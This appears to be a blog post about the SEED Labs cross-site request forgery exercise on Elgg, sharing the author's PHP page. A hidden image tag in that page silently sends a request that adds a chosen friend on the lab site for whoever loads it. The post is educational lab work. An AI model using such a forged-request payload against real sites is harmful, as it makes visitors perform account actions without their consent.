Home » Uncategorized » Cross Site Script Forgery

Cross Site Script Forgery

Here is the link for the Cross Site Script Forgery lab at the SEEDLab:

https://seedsecuritylabs.org/Labs_16.04/Web/Web_CSRF_Elgg/

Click on the description link and you can get started. Here are some of my notes from the first few parts: https://drive.google.com/file/d/11ak1drp0wX7uOtLdGBB6Te-ZcRotCMeX/view?usp=sharing

Some of the code is supplied here: https://www.handsonsecurity.net/figurecode.html, so this will make it a little easier. Here is also the index.php I wrote for the first exercise:




<?php
print "<HTML>" ;
print "<BODY>" ;
print "<img src=\"boom.gif\">";
print "<img src=http://www.csrflabelgg.com/action/friends/add?friend=43>";
# add boby as a friend
# http://www.csrflabelgg.com/action/friends/add?friend=43&
print "</BODY>" ;
print "/<HTML>" ;
?>

I downloaded this gif to use as boom.gif in the above php file:

Leave a Reply

Search

Categories

Archives

Categories

RSS FinTech

  • An error has occurred, which probably means the feed is down. Try again later.

Digital Ocean

this site runs on Digital Ocean

Powered by WordPress  |  Compass by InkThemes.